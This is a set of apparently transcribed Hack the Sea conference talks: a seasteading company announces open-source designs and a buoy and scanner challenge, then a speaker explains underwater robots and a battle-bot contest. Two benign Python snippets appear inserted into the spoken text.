we're hoping to partner with other companies that are doing these things because there's so many different things that need to be developed to make this happen. We're kind of trying to reach out to the community, we're trying to reach out to people and say hey this is the new frontier. I think this is the most exciting thing humanity has on the go right now that is possible and feasible for anyone to just say I want to get involved and actually make it happen and it's feasible. It's not like doing a startup and going to Mars. It's a massive project, takes a lot of money. This is something we can do, we can actually decentralize a lot of the development of this technology so people around the world that are right now on lockdown maybe and don't have a lot to do can actually find ways of contributing to this project. That brings me to something that I'm really excited, we're announcing at first here on this conference is that we are releasing all of our technology, we're releasing all of the programs we're doing and we're releasing the designs of our C pods, all the software and releasing it to be open source. We're doing this because we want this to happen. 
We are not doing this for any other reason than we are passionate about it, we love it, we love the idea of being able to live on the ocean, being able to open this new frontier, being able to develop new technologies, eco-sustainable technologies, marine restoration technologies and all the other things that need to be developed to make this happen. It's really exciting. We're all just, there's a lot of, there's a very big community of C-STETers. There's actually a big community at DEF CON that's like a big on C-STETing but outside of that as well there's a huge community that are really passionate about seeing this happen. We have a decentralized team all over the world that we're trying to get them to collaborate and get them to focus on different areas of development and if we can do this, I think we can make 20 years of development progress in the next couple of years if we can do this right, if we can really focus and find a way to make it happen. It's really exciting time for us and we hope to put the call out to the community here and say, well, who wants to be involved in this? Who wants to help out with this? Who wants to contribute whether it's just writing a little bit of software code or maybe making a design for a floating drone or your own floating house design that you think might be better than what we're doing? You can actually take our designs, you can take our software code, you can take our designs for the, I've been sweating over for the last year plus and you can say, well, that's really beautiful, I love it but I want it to be longer, I want it to be taller, I want it to be a different shape, I want, you know, whatever it is, you can take our CAD drawings which are being, everything's in the process of being uploaded, hopefully by the time this presentation starts, a lot of our code is going to be on our GitHub account so you'll be able to go there and download code and start playing with things which is what we want to see happen, we want to see this progress, we want to see this move and it's just really exciting, I think we can do a lot and I'm kind of inspired by the idea of this lockdown for a lot of people has been horrible, it's been kind of boring, it's been a time of frustration and I think we can maybe turn things around and what if we could mobilize millions and tens of millions of people around the world to actually do something productive with their time if we had millions of people contributing just a couple hours a day to different projects that they're passionate about, put all that together and we could have an incredibly different world, new ideas, new techniques, new things that we weren't even thinking about before, they can develop very quickly but we have to just try to find a way to focus their energies on something that is productive and I think we have a track here for developing technologies on the ocean to build floating homes and a floating ecosystem that can thrive and has a lot of potential I think for humanity so I'm really excited about it, I'm really excited about opening this up to the open source community and having you guys take what we've been looking at and what we've been trying to do and what the C-Steadding community in general has been trying to do and we want to move this forward so I invite you to take part in the whole conversation we're going to be having here today, we're going to be sharing a lot of things we haven't shared publicly before and giving a lot of things away so yeah we'd love to have you involved, we have 
mobile app, all the code for our mobile apps is being uploaded it's probably going to be here by the time we start this presentation, the back end software for controlling C pods, controlling floating homes is all going to be there, IOT software it's still in development but we might have something to upload by the time this conference starts, IOT hardware, we have all kinds of things coming together so we'll be posting our plans for hydroponic system that is really cool, I think it's a super high yield technique for growing food that I'm really excited about, we'll be putting as soon as we have Gerber files for the actual circuit design for our home automation hardware we will be publishing that as well so it's very exciting lots of stuff going on so CAD drawings for all our models, CAD drawings for our boats and once again we just want to open it up and if you have a better design or newer design or maybe there's parts that we're missing that need to be designed we're just asking for people to, if they're passionate about this, to contribute and see where we can take this, I think we can take this to something really incredible so we're going to start now a movie that we made to kind of show what's been happening with with seasteading, what happened with our event in Thailand and the whole controversy that happened over there so this is a little presentation that kind of takes you through all that so I hope you enjoy it then we'll come back and we'll go into the live section Welcome to Exly the first seastead, as we come in from this beautiful entrance, we have this before and here's the kitchen, we're not used to all of her magic, anything special about the kitchen? Just fresh water, we could refill as needed but we've never had to do that because I have a water maker This is the big kitchen table underneath, it is actually where this bar entrance goes, I would let it show you but there's a hood out there, we have a nice little electric room, I understand electricity There's a little hidden storage, all of this, it's kind of a good size but also a good closet Pretty decent size, should be great for all these small home lovers out here So you have so many? 
Yeah, all right, we got some islands off in the distance, so those are, I'd say, 20 miles out. I'm gonna go and spend the day on the island if you're a little tired of just floating around. So plenty to see out here, all within a short sailing distance. All right, that's it. About two days ago there was an article in the Thai media talking about the seastead, basically right out of the gate saying it was a threat to national security. I can't see how they would see a loving couple living in their home on the water as a threat to national security. We understand how the media works; the media in Thailand is basically a mouthpiece for the government. So anything the government needs to do, they just use the media to express it, basically set the narrative so that people know where they stand. There's some contacts we have from the military. We contacted them, they said, yep, they're all up in arms about your seastead. They're all up in the military at the top level, they're beating their chests, they're trying to one-up each other on who can shoot it down the best. Just into the night we were trekking through mud, up to our knees at low tide, trying to quietly get out of Phuket, in case the stories weren't all BS. The way things work in Thailand is it's a military dictatorship, so if they want somebody to give them trouble they just take them out. We're not going to take the chance; there's no due process, as they obviously displayed by taking out our seastead. They destroyed our home. I had everything I owned there; I just had a bag with clothes since I was in Phuket. Fortunately I was in Phuket, otherwise they probably would have just taken us down with the seastead. Chad Elwartowski's sister says seasteading has been a dream for him, but one that has now turned into a nightmare. Oh my god, I'm sick, I'm just so sick about it, I just want him home. Family and friends of Chad Elwartowski fear his life is on the line; he and his girlfriend are now on the run after Thai police officials accuse them of essentially trying to lay claim to Thai territory with their floating house. All of a sudden it changed to where he became a fugitive; it was almost like you're reading something out of a movie. My greatest fear is that he's going to end up killed through all this. They were just living there, they didn't build it, they didn't buy it, they were living on the seastead, but now they are hunted as criminals. I was just going to FaceTime him and be able to see my brother and now I can't, you know, I can't see where he is, I can't talk to him, you know, it's just killing me, I'm sorry. It's hard. And we're also trying to communicate with Chad ourselves; we'll let you know if he's able to reply. Kimberly Craig, 7 Action News. Nadia, she's Thai, so her family — her son was supposed to start school this week. We're trying to sign him up, we had to go in this week and go take care of that, but she can't, all this is all messed up. It doubles our resolve; the seasteading has to happen. We're obviously still, I mean, this week was a whole hit on freedom. We needed to show that we can; we were free on the seastead, if only for a moment, and it was great. When I die, at my funeral, I'd like them to show that I lived the life. So far we're safe, but we fear for our lives. Nadia's very worried; it's been hard for both of us. So far we're still alive; that's all we're trying to do, is stay alive. Okay, hello everyone, well, so hopefully that gives you a good overview of what we are doing, what we're 
about, and just kind of the plan A to B from a very high level But excited to be here today to be able to speak with you all and share with you our vision of what we're trying to do Like I said at the beginning, we see this as the new frontier, like this is almost an undiscovered country because people have never really been able to build a home that can float on the water That can be in international waters on the ocean, and so we kind of cracked the code a little bit with this And what I'm really excited about is just in the last week, like I shared just before, we are now announcing that we are open sourcing all the technology, all the software, all the hardware, everything we're going to be developing for making this happen is going to be open source And it's on our GitHub right now, hope you guys can hear me right now And if you have any questions posted in either the general text area or the C-studding text area, and I'll try to answer your questions or whatever you have while we're on live here And I'm going to share my screen, and let's see right here Okay, hopefully you can see my screen. So like I showed earlier, this is the original prototype. It wasn't anything special to look at, but when we were sailing towards it for the first time and we saw it there, first it was off in the distance, there's this little white dot, and it was just getting bigger and bigger and bigger and it was just, it was an amazing thing to be there because it felt like this represented something Like a whole new thing that's starting from scratch, like the whole new frontier was starting from this just one little dot, and it was really exciting to get to approach it and see it getting bigger and bigger, and then to actually be there and then to actually step foot on the C-stud, that was pretty amazing I was involved in a project called Freedom Ship about 20 years ago, which was a project to build a floating ship that would travel all over the world every two years and stop at different ports of call as it went along, so it stopped around different cities and different countries around the world So I thought that was just the most amazing thing because it felt like, wow, this was really an amazing, you get to live at home on your, you know, one of the 20,000 condos that would be on this floating ship, but you could also see the world, which I thought was a really fantastic idea The problem with that is it was going to cost like $7 billion to start, so it just couldn't get off the ground because that's so much momentum that you need to do to get to that point that it's just really hard to do that, I mean, about $7 billion hanging around to start that kind of a project So what I loved about this when I saw this was that this only cost $150,000 to build the first prototype, that's just building one, so the idea was if we built like 20, the cost would go down, go down and be even more affordable for people And so when I first got involved, the units looked like this and that was not very attractive and it's not something that really inspires people to want to live there, so we felt it was really important to, well, I felt it was really important to make it something that when you looked at it, you said, wow, that's beautiful, that's amazing And so that kind of inspires you to want to visit, to be able to experience it, to see it for yourself, your own eyes, or to just walk on it and see what it's like and check it out, and just inspire some curiosity So that was kind of started a whole year and a half of 
major redesign that we've been doing, so now the houses kind of look like something, it's the same kind of general structure, but now it's like something that jetsons rather than something out of, I don't know, something much more prehistoric And so I think we have a beautiful design now, and so we are in Panama, like I shared, this is one of our renderings for the new design, I think it's beautiful, some people love it, some people don't, but I think most people are, think it's pretty darn interesting and looks a lot better than our project I think it's, I really wanted to capture the idea that this is a futuristic thing, that this can be a futuristic and technological achievement, because the technology that goes into making this is very, very simple, but it just hasn't been done before And I've had this technology to make this happen for the structure for a very long time, it's the same structural backbone as making the oil rig, where you have this big pole that goes into the ground, or not into the ground, sorry, into the water, it's kind of like when you have a wine bottle and you throw it in the water and it'll just float And then it stays, it stays afloat, because it'll just stay there forever, but it kind of bops around and it's very, not very stable, so what we do to make this very stable is we put a very heavy weight underneath, like very far below the water And that's about 100 tons of weight, like 100 tons, that's a lot of weight, wouldn't want to have that fall in your foot, but so it's very heavy, and so that makes it very stable and then we tie it down with three mooring lines, so it's locked in place, it's very averse to bad weather Because normally when you're in the water, waves come along and your boat is moved around a lot by the waves, but in our case, you can see from the designs here that the house is about two and a half meters off the water, so the waves pass it There's only a little bit of interaction between the waves and the poles, because it's just a fairly thin area, and the waves just kind of go around So we're excited about it, and we're building in Panama, like I said, we're open sourcing, which is something we're announcing, we're officially here, we've started getting all our code on the GitHub account, so you can go there right now and we have software for mobile apps that will be able to control your smart home, your floating smart home So it's actually our code is written in Flutter, so it's can be used for both iOS, Android, as well as for web apps, so it's really nice little platform, so it goes all three ways And so right now we have the beta there, it's not released, it's released into the Android store, but not yet into the Apple store, so you can go there on the Android store, you have an Android and check it out, I think you can just search for ocean builders, but on our GitHub there's, we created several different repos for different projects that we're really excited about, and I'll show you some of the projects we're really excited about, and for anyone that signs up to do any of our challenges, we're going to give you some exclusive first look details on some of the things we're excited we're working on There's some things breaking right now that I can't talk about yet, but should be able to in about two weeks, so anyone that signs up for our challenge, we will, you'll get first access to some of those details, and it's, I'm just, my mind is blown by all the stuff that's going on right now We're making like more progress in the last two 
weeks than most of the sea-steadying history has made in the last 10 years, it's really, really exciting to see, it's really moving fast, so it's like trying to keep up with it So part of the reason I wanted to do this conference was to reach out to people like you guys that are passionate about building really cool things, hacking the future, hacking technology, and finding ways to make technology work better for us, and that can be any different kinds, that can be in so many different kinds of ways That can be from writing software, hardware, figuring out new hardware, and building different devices that have never really existed before because there hasn't been so much of a need, like we've never had a floating city before, so this will create a whole new wave of entrepreneurs that can create all new kinds of technologies I think a lot of the technologies that will be invented, that will have to be invented to live on this kind of floating future, would be pretty breakthrough and pretty amazing, although there's some text over there, I don't know if you guys have any questions Waterworld, so some people say yes, is this like Waterworld, and I kind of reply to that, this is more like the Jetsons on the water, so it's pretty different from that So probably stupid question, why have Log smaller than the part where people don't purpose the Log serves? I'm not sure what you're talking about I'm just going to take some live questions here while you guys are asking them, I was wondering a bit about the relationship with the local communities and areas you're building in, for example outreach and support So that's something we're really trying to emphasize a lot this year, now because we've learned what not to do in the past and we're trying to improve and make things better, so we're actually in Panama like I said, and when this whole pandemic started, we have some very large scale 3 printers, one is 20 feet long by 16 feet wide and 8 feet tall, made by Rectorbot, rectorbot.com And then we have another one that's one meter by one meter by one meter, so they're huge, so we wanted to see if there's something we could do with printing emergency medical supplies, so we're actually working with the government of Panama to help 3D print emergency medical supplies We were on it right away at the beginning of the pandemic, the government took a little bit of time to set up all the regulatory procedures for how things would need to be certified for health use and all that, so that took them a little bit of time, but they're, I think they're almost ready to go So if there is a second wave, we're all set up, all the health stuff is all ready to go, so we're ready to start going into production with making emergency medical supplies, or parts for hospitals, for machines in hospitals, or any where else that they might need supplies, so we'll be able to help out there We're creating a lot of jobs, we're creating high tech jobs as well, and we're bringing foreign investment in the country, so we're doing a lot, we also several times, every couple weekends we do deliver food to communities that have been impacted by coronavirus, so we're definitely doing as much outreach as we can So 100 tons is feasible to move, there's a couple different versions we're working on, there's the deep water sparer model that goes about 35 meters deep total, and that has a 110 weight at the bottom, so that's not very easy to move at all The other one is a shallow water model, and that is only about 5 meters deep, and that's much 
easier to move They can all be moved, but they're not really made to be moved, now we are considering designs that would allow you to fully move your house, but that's an experimental thing, we're actively building tests and prototypes right now to test that So it's kind of cool, I actually had to have a picture of those, one of the prototypes, this is actually one of the prototypes of the movable version, this would be the hull that goes under the water, just kind of an interesting design Oh here it is actually, so you can't really see too much, but this is a small 1-8th scale size of just a transport vessel using the same technology, so instead of having a normal shaped boat, this actually is called a swath, so it has two hulls that go under the water, so this is one hull here And the other one is on the other side, kind of out of focus here, then you have these arms that go down, and the water line would be about here, and here, and then the base, the house, or the vessel, the boat, where passengers would sit, would be on top So it kind of rides above, it's the same kind of idea, it rides above the waves, and the reason we make this is that we found when we had the first C-STED it was hard to get from point A to point B when there's big waves, and it was hard to be able to go to your house and pick people up or whatever So we designed this kind of craft to be able to break through very high waves and still get places where there's not so good. Let's see, I'll get some more questions. Is it possible without including the ocean? Yes. Our first C-STED in Thailand was 13 miles from shore, and what's interesting was, when you're that far away from shore, there's no life in the water, people think that the ocean is filled with life, but there's really not a lot of life There is, it's just water mostly, because there's no place for life to congregate around, so we put our spar into the water, and two months later there's thousands and thousands of fish around, there's a lot, it was hard to, like you couldn't look anywhere and not see thousands of fish We have video of that, it was pretty astounding. So can you do it without polluting? We're actually creating an environment for fish, so we actually are building our homes in a way that is eco-restorative. We have some ways of composting our toilet water, so it actually becomes compost. There's some methods of using electro-coagulation for treating gray water, instead of using other processes, electro-coagulation is a fantastic technology that's not really used very much, and we have a version of it that I think is an improvement of what else is being used. So let's see, jump through some other questions here. Okay, thanks Pierre Snickles for the SWATH link there. Okay, so we have some projects, I'd like to just go over them, we're actually going through time here pretty quickly, so I'll give you a bit of an overview. This is our manufacturing plant we started building just before, this was like early February. We just started putting the concrete in for the bases for the poles for the frame for the manufacturing plant. Now this was about two weeks ago, this picture, so now the plant is up, which is, hey, we got some work done even during a global lockdown. We did little pieces here and there, but there was a lot slower obviously, so we're about three months behind, but we're forging ahead as fast as we can. This is a pretty huge building. 
It will house two C pods without the pole, of course, inside at a time, so we can produce two at a time at this location. There's a view of the inside. This is our roller machine, so our ground spars that go into the water that you saw in the pictures, those will be rolled on this machine. You put these big slabs of flat steel and it goes through and rolls it and then bends it a little bit and then you go through again and bends it, bends it, bends it and keep on putting it through until you get the right curvature on the steel. I haven't seen it in person myself because I'm in Canada right now because I left before the lockdown so I can get some things done up here. We have a full team down in Panama working as well. This is our main engineer, Rudiger Koch, who is a German aerospace engineer. He started Seasteading because he wanted to go to space and he decided that he needed Seasteads to be able to have as a platform to observe the places where he would be launching his vehicles into space or things that he'd be sending up into space. So he's definitely a pioneer. So this is a view of him looking through one of the molds that goes to the central spar inside the house. There's more images. Let's see. This is our development site where we're actually going to be putting the homes into the water. We set up a technology incubator. So we can kind of play the, I don't know if this video will play. Then, yeah, so we set up a technology incubator where we have people from all over the world coming down to help us figure out really cool technologies. We have all kinds of really fantastic technologies that I'm really super excited about. I'll talk about those soon. This is a video of me swimming around the underwater spar of the original prototype in Thailand. And there's just thousands of fish there, even more and more and more as the video goes on. So I can't jump ahead on the way it's lined up. It's pretty cool. This is us in Panama. We're launching another prototype. This is a one third scale, but one third scale is actually very large still. So we're towing it out to the site. And here we're standing on it. And so this is the spar. So the full scale size would be three times water, three times taller, three times longer. This is just the pole and then the base to test some engineering principles. So I'm going to jump to talk about some of the projects we are really passionate about. One is the Aquaboy, we're calling it. Names may change, but we'll post the exact details of this, I guess, with, we'll coordinate with DEF CON about all the details of this. But this is the basic idea. The vision of what it might look like and all the specifications may change and be modified and refined. But the idea is that we have this like a water buoy that would just collect data. And data for us is really important because if there's a big storm brewing a couple of miles away, we might want to know. You might want to get back to our Seastead and just prepare for rough weather, weather, or do whatever we need to do. Or if we're out fishing nearby and you might want to go home and tie up the boats or something like that. So we'd like to have like a remote beacon that can check weather, check wave heights, see if there's some big huge rogue wave coming our way. We'll be able to monitor weather in different locations so it can check wave heights. So movement from this flat average sea level and then if the sensor goes up two, three feet, then goes down two, three feet below the horizon. 
And we know the wave height is like four feet. And we'll know the time between the maximum heights, and between when it goes to the lowest point and back up to the highest point. So we'll be able to measure the period, the wave period, and the wavelength as well, since we know the time in between. So we can get some really valuable data; we can collect data underneath the water as well as above the water. We can collect turbidity levels, oxygen levels, pH levels, all kinds of really cool things we can collect. We can even have cameras under there and collect data on nearby ecosystems and see what the coral is like there and just monitor over time. We can have instruments on the top to measure air temperature and whatever other factors, humidity or whatever. And then what's really exciting about this is also we may look at going into new areas we've never been into before, and we might put these buoys in areas that we've never been that we want to look at, maybe for living there or putting a whole community there in five years or in two years. But we can put a buoy there and collect data for a year and just see what the average conditions are throughout a year or two of collecting data. Like, is that a good place to be, or are the waves usually good there but then there's some crazy waves that really make it not such a nice place to live? And you can get some really good, valuable data from that for ourselves, for where we might want to seastead. But maybe there's also useful data we can collect for environmental purposes, environmental monitoring, share it with organizations that track the effect of different water temperatures on coral — and we have cameras and can see what the effect is of different water temperatures and different water conditions on coral in the area. So we can do some really cool things, I think, especially if we had like 10 of these all over Panama where we're located, and we can maybe crunch it with AI and get some really, really cool, useful information. The Aquaboy would be geostationary, so we'd ideally like to hold it in place, and we'd have our partner engineers come up with the best way of doing that. Yes, so we will. We have a sign-up page pinned on the seasteading chat on our channel here, so sign up there; we have tons of projects that we're very excited about. We're going to pick a winner for all these different projects — I guess we'll pick that next year at DEF CON in Vegas, maybe put some of these in the water and see whose performs the best. And then we'll have some really cool prizes, and we'll feature you as a contributor, as a winner. Plus we have tons of media that's always trying to cover us because we're doing some pretty interesting things, and sometimes we want to highlight our partners and people that we're collaborating with. So I think there's some really cool, fun opportunities; there will be some cash prizes, and we will be picking someone that wins from those participating in these projects to fly them down to Panama and give them a couple days on a seastead so you can experience it for yourself. So I think it's some really fun and cool stuff we have. We're building the future, and the future is floating, and it's really exciting. So let's see if there's any more here. How do you power it? How do you anchor the sea house to the ground? Okay, so, so how do we, how are we powered? The default system of power will be solar. So we have to be pretty conservative with power. 
We will have, of course, batteries, and we're looking at using a propane backup. So if the batteries run really low, then we can switch on the propane backup, propane power backup, and then hopefully in the not-too-distant future we'll be able to make methane from seaweed. And then we'll use that in our generators as a backup power source. We're also looking at some potential power generation from the water itself, using OTEC. It's a little bit tricky to use, but we may have a way of solving that with a small-scale version of OTEC, which is ocean thermal energy conversion. And wave generators and some other things that we're looking at. We have some people that we're partnering with that have some wave energy generators that they're developing in St. Lucia. So we may partner with them to bring that to Panama as well. Some of the other projects I'll mention quickly — let's see, the Aqua cycle... no, not that one. So many projects, both in communication with ML. So I guess the one that Nina was talking about yesterday would be a swimmer. So we would be doing the Aquaboy. Yeah, the Aqua scanner is really, really cool technology. The idea that was suggested originally — and this can change — would be to have a really inexpensive add-on that you can add to any normal drone. That would be like an array of cameras that you could dip in a grid over the water. So you can have like a grid like this; each of these red dots would be a point where the drone's array of cameras would go into the water. And then that takes pictures with three cameras under the water at an angle. So you get three pictures at once: one this way, one 120 degrees offset from that, and another 120 degrees off that. So you can put all these pictures together and get like a 3D image — photogrammetry, I think it's called — and you stitch all these images together and you can recreate a full 3D recreation of the surface of the underwater landscape, which is breathtakingly beautiful. And I think it's really important for research to be able to do something like this because you can see what is going on with the ocean live as it's happening. And you can do it year after year and compare to see what's going on with the ocean, what's going on with the coral. And you can see if there's improvement in any areas and if there's a reduction or depletion in any areas. We can also put different sensors on the scanner so we can detect other things like pH or other things we want to measure, and then we'll have this incredible database of highly precise data that's mapped very, very quickly and very inexpensively, because this really shouldn't cost very much. So we have all these things pinned on our seasteading page, on our seasteading channel. So please check that out. Underwater drones would be great — yeah, we'd love to have some underwater drones. I'd love to coordinate, I think, with Dave, who was supposed to be on the talk yesterday with Nina talking about how you do underwater IoT; I'd love to be in on that as well. And let's see if there's anything else — I have just a few minutes left, so I want to make sure I cover as much as I can. So basically, we wanted to come here because we wanted to really reach out to people to help, because I think this is like the most exciting thing that's going on on the planet right now — maybe I'm a little bit biased. 
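As a concrete illustration of the aqua scanner idea described above — dipping a three-camera array at points on a grid, with the cameras 120 degrees apart, so the shots can later be stitched photogrammetrically — here is a minimal planning sketch. The `DipPoint` structure, the lawn-mower ordering, and the 50 m by 30 m patch with 5 m spacing are assumptions for illustration, not the actual scanner design:

```python
import math
from dataclasses import dataclass

@dataclass
class DipPoint:
    x_m: float                  # east offset from survey origin, metres
    y_m: float                  # north offset from survey origin, metres
    camera_headings_deg: tuple  # yaw of the three cameras at this dip

def plan_scan_grid(width_m: float, height_m: float, spacing_m: float,
                   base_heading_deg: float = 0.0) -> list:
    """Lay out the dip points for the aqua-scanner survey described above:
    a regular grid over the water, with three camera headings 120 degrees
    apart at every dip so the shots can later be stitched photogrammetrically."""
    headings = tuple((base_heading_deg + k * 120.0) % 360.0 for k in range(3))
    points = []
    ny = int(height_m // spacing_m) + 1
    nx = int(width_m // spacing_m) + 1
    for iy in range(ny):
        xs = range(nx) if iy % 2 == 0 else range(nx - 1, -1, -1)  # lawn-mower path
        for ix in xs:
            points.append(DipPoint(ix * spacing_m, iy * spacing_m, headings))
    return points

# Example: a 50 m x 30 m patch of reef, one dip every 5 m (illustrative values).
plan = plan_scan_grid(50, 30, 5)
print(f"{len(plan)} dips, e.g. first: {plan[0]}")
```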
There's, there's so many technologies that can come from this because we need to develop technology to be able to live successfully on the water. So we're kind of doing a call to action here and we want this to happen we're excited about this happening. And we're opening we're so excited about it we're opening all the technology up to be open source. So anyone any personal individuals or corporations or anyone else can come in afterwards or come in anytime they want and download our code download even all of our designs for like our CAD drawings for all our homes and everything we're building is growing up on our GitHub we're probably going to move it somewhere else eventually but for now because I get helps not the ideal place for CAD drawings but we're starting there. We just threw it all up in a hurry this week so it's all there now you can all download it for archival purposes if you like. So yeah we're really want to call it community and see who can contribute who's excited about this who would like to contribute in some different ways, help us with hacking 3d printers like large scale 3d printers to be able to print we would like to be able to within a year we would like to be able to 3d print an entire floating home in like a long weekend. We think it's possible get some ideas and how to do it but we need some help figuring it out because we have the hardware but we don't have the software and things to make it up and figure out what all the materials are going to be. We have some really cool IOT we love some really cool IOT projects home automation projects, hydroponics we have some really kickass hydroponics things we're doing 3d printed coral gardens, aquatic transport drones. So yeah there's a lot of things here that are really exciting. So hope you guys got to answer most of your questions. So I'll be around on and off for the next couple hours and then I'm going to have dinner and I'll be back around so I'll be available to answer questions. Try to put them on the C-Steady chat channel so I make sure I see them right away and it's easy for me to find them and I can get in touch with us. My email is grant at oceanbuilders.com it's grant at oceanbuilders.com. So yeah please go and sign up for our challenges. Tell us what you're interested in participating in we'll send out more information on the challenge that we're going to be doing and I suppose we'll be coordinated with hack the sea organizers as well to get all that information out and see you there. So I guess that's the end.
|
Hacking the SeaPod
|
10.5446/51636 (DOI)
|
Hey, Safe Mode, welcome to Hack the Sea. I'm Kitty and I'm here to give you a brief explainer on what UUVs are and what your challenges are. So essentially, a UUV is an unmanned underwater vehicle, or as I like to say, an unpersoned or uncrewed underwater vehicle. Underneath the category of a UUV, there are two central subtypes. There's the AUV, the autonomous underwater vehicle, and the ROV, the remotely operated vehicle. And the key difference between these two is one is a self-guided, self-contained system, the AUV, and it makes its own decisions and completes its own tasks without human guidance or interference. The ROV, conversely, is usually a tethered system, but either way, it's connected to a human who's helping the machine complete its tasks and follow its guidance. Essentially, what we're talking about here are maritime robots. So why do we need maritime robots? Well, most of it is about exploring or extracting stuff from the ocean. And what we know about humans and the ocean is that if you put a human under the water on a long enough timeline, they tend to die. So the history of the development of technologies for exploration and extraction used to be about putting a suit around a human or putting a crew inside some sort of undersea shelter that would allow them to do the things they wanted to do. And that timeline is quite long. So what you're looking at in this image is an atmospheric diving suit, and that I think is an image from 2014. But more interestingly, the submarine you're looking at, what essentially looks like a barrel with a window on it, that model is from the 1700s. So the history of trying to extract and explore the ocean is quite long. The other thing that we tend to do under the ocean, largely brought on by a number of wars, is we do tend to do fighting underneath the sea. And what you're looking at here is an example of a manned torpedo. So the way this works is this person sits atop this torpedo, and in front of this person is a timed warhead. And what they do is they guide the torpedo to its location. The driver drives the manned torpedo over near the enemy ship, attaches the warhead, and then drops off and swims as fast as they can to get away. So presumably people signing up for this job probably drew the short straw. But this is much of what drives the development, at least for militaries, of the UUV, because this is a high-risk environment. So what we're asking you to do at Hack the Sea is to start thinking about ways to create some battle bots. And so I have three essential, easier and harder design sets that you want to start thinking about if you want to play next year at DEF CON 29. So the easier way to think about this is to tether. And so if you wanted to engage in your battle and you wanted to tether your bot, you certainly have a lot of access to power, you certainly have a lot of access to data, and your maneuver capability is higher. But this is the easy model. And in all honesty, I would be surprised if we allowed people to operate tethered in this way. The harder challenge, and the one I think we want to see you guys do, is the untethered remotely operated robot. But we will come out with guidance on that challenge pretty soon. The problem with that untethered remotely operated robot is that under the water, radio frequency doesn't work. And so you're pretty much left with sound and maybe light. And so good luck on that, and we look forward to seeing what you come up with. 
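To put a number on "radio frequency doesn't work under the water", here is a rough sketch using the standard good-conductor approximation for plane-wave attenuation in seawater (conductivity of about 4 S/m). The approximation gets loose up at gigahertz frequencies and the figures are order-of-magnitude only, but they make the point: Wi-Fi-band signals die within centimetres, and even very low frequencies only manage tens of metres, which is why sound and light are the practical options:

```python
import math

MU0 = 4e-7 * math.pi      # permeability of free space, H/m
SIGMA_SEAWATER = 4.0      # conductivity of seawater, S/m (typical value)

def attenuation_db_per_m(freq_hz: float) -> float:
    """Plane-wave attenuation of an RF signal in seawater using the
    good-conductor approximation: alpha = sqrt(pi * f * mu0 * sigma) Np/m.
    (Only rough at GHz, where seawater stops behaving like a good conductor.)"""
    alpha_np = math.sqrt(math.pi * freq_hz * MU0 * SIGMA_SEAWATER)
    return 8.686 * alpha_np   # nepers -> dB

for label, f in [("2.4 GHz Wi-Fi", 2.4e9), ("433 MHz ISM", 433e6),
                 ("125 kHz", 125e3), ("10 kHz VLF", 10e3)]:
    a = attenuation_db_per_m(f)
    print(f"{label:>14}: ~{a:8.1f} dB per metre "
          f"(~{60.0 / a:6.2f} m to lose 60 dB)")
```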
Another challenge that you want to think about is where on the water do you want to be? And we will have separate challenges for that. But essentially there are three general positions. There's your floaters, there's your swimmers, and there's your bottom crawlers. So your floaters will obviously have more access to light and potentially communication. Your bottom crawlers will be in their most austere position, but they will at least be able to locate where they are in the water because they can touch the bottom. And interestingly and quite challengingly there are your free swimmers and who even knows how you're going to figure out how to orient yourself in that condition. The other thing that you need to start thinking about is how to power it. So the way the military powers things, in particular submarines, is either nuclear power or diesel electric. These are probably not two categories you'll be allowed to use. So I look forward to seeing what you guys come up with. That is about it for my explainer on UUVs. I didn't want to take it on too long, but I do want to say that I know that you see me wearing a bow tie, and that bow tie is really because I want to dedicate this talk to a friend, a colleague, and a mentor, Will Bundy, who passed away this last December. He was a huge part of the Naval War Colleges, moved toward innovation, and he was a big proponent of thinking about all sorts of unmanned autonomous systems. And so I just wanted to say thanks and we miss you. And now that that's done, I figured I would have a little fun at the back end of this video. So I tried to think about how to work in some sort of reference and a tie between cocktail and this video, and I couldn't, so we're just going to make a cocktail. So what you're going to need, I'll move my camera in order to make a Manhattan in the style that I make a Manhattan, is you're going to need some bourbon, and you're going to need some vermouth, you're going to need some bitters, some cherries, some ice, and a way to stir it. Let's give it a shot. So I tend to make a pretty stiff Manhattan, so I just want to warn you advance the three foam proportions to be prepared for a stiff drink. So you're going to start with your bourbon. I have here something I bought from a local distillery, filibuster. It's a really nice standard bourbon. They call it a whiskey because they age it in a different way. So you're going to take two and a half parts of bourbon. You're going to grab some vermouth, a sweet vermouth. I can use this thing called carpano antica, which is considered an amaro, but that's fancy words. Just get a sweet vermouth. You'll learn over time what your favorites are, and I do one part of that. And now I'm going to put my bitters in. So I go with two different kinds of bitters. I go with angostura bitters, and then a little bit of what's called tiki bitters, but really you should play around as much as you want with the bitters. So you find out whether you like that deep, crispy flavor or something more peppery that's entirely up to you. Put a little bit of this in here. Healthy dash of angostura bitters. And the thing that I find that's most interesting and important and also controversial is I believe strongly in allowing the flavor of the cherry to come into the Manhattan. And so often what I'll do when I buy my cherries is when I put the cherry in the drink. There, see this is a tethered cherry. And I put just a little bit of the cherry juice into the Manhattan to give it just a little bit more cherry flavor. 
In the real world you should be stirring this for somewhere 20 or 30 seconds to get that temperature way down there and to mix all the sugars together. And I have forgotten my skimmer, so I'll just put my finger down here. That's how you make a Manhattan. I will say for anybody who makes it all the way to the end of this video hit me up at Defcon 29 and I will definitely help you make your own Manhattan. I look forward to seeing you guys. I look forward to seeing the battle box. Take care. Thanks guys. Turn this one off. Alright, let me turn my cameras on. Hey guys, I wanted to say thank you. I don't know why my camera's off. I'm sorry, my screen. Who knows anyway. In all seriousness, the challenge that we're dreaming up for Hack the C. It we're hoping to play out in in 2021. The challenge we're really looking for is going to be a hard to try and do this the hard way right so there are going to be two categories or classes and I want to talk a little bit about the swimmers and then I'm going to kick it over to Grant and Grant is going to talk a little bit about the floaters. So, and in while I'm doing this, this this part of the preso, feel free to text in some some questions and answers. And then after Grant talks a little bit about his challenge on floaters, I want to kick it over in a very weird way. You're going to listen to him on my phone because we can't get his audio enabled. You're going to listen to Dave talk about undersea IOT, which is a growing commonality in the water. So, so okay, so here's the deal. Next summer, we would like to see you folks bring some bots to battle in the water. The swimmer class is going to hopefully operate untethered. Now, what does that mean? That means that all of that. All those advantages you have normally by attaching a tether to your bot so that it can go through an obstacle course aren't going to be there. In particular, one of your greatest challenges is going to be power and the other one is going to be comms with your bot to get to go through a system. You have all the opportunities you want if you want to make it an AUV if you want to make it autonomous that's great but you got to be careful right because it's an obstacle course. So here are the general rules and then as we go forward, we will be sending out specifics and guidelines, but in general, we're hoping that your bot will not be any bigger than checked luggage. Ideally, it will be about the size of carry on luggage. Why did we do that? We did that because we need you to get your bot to Vegas and in order to get your bot to Vegas, it's got to fit in some luggage. Otherwise, 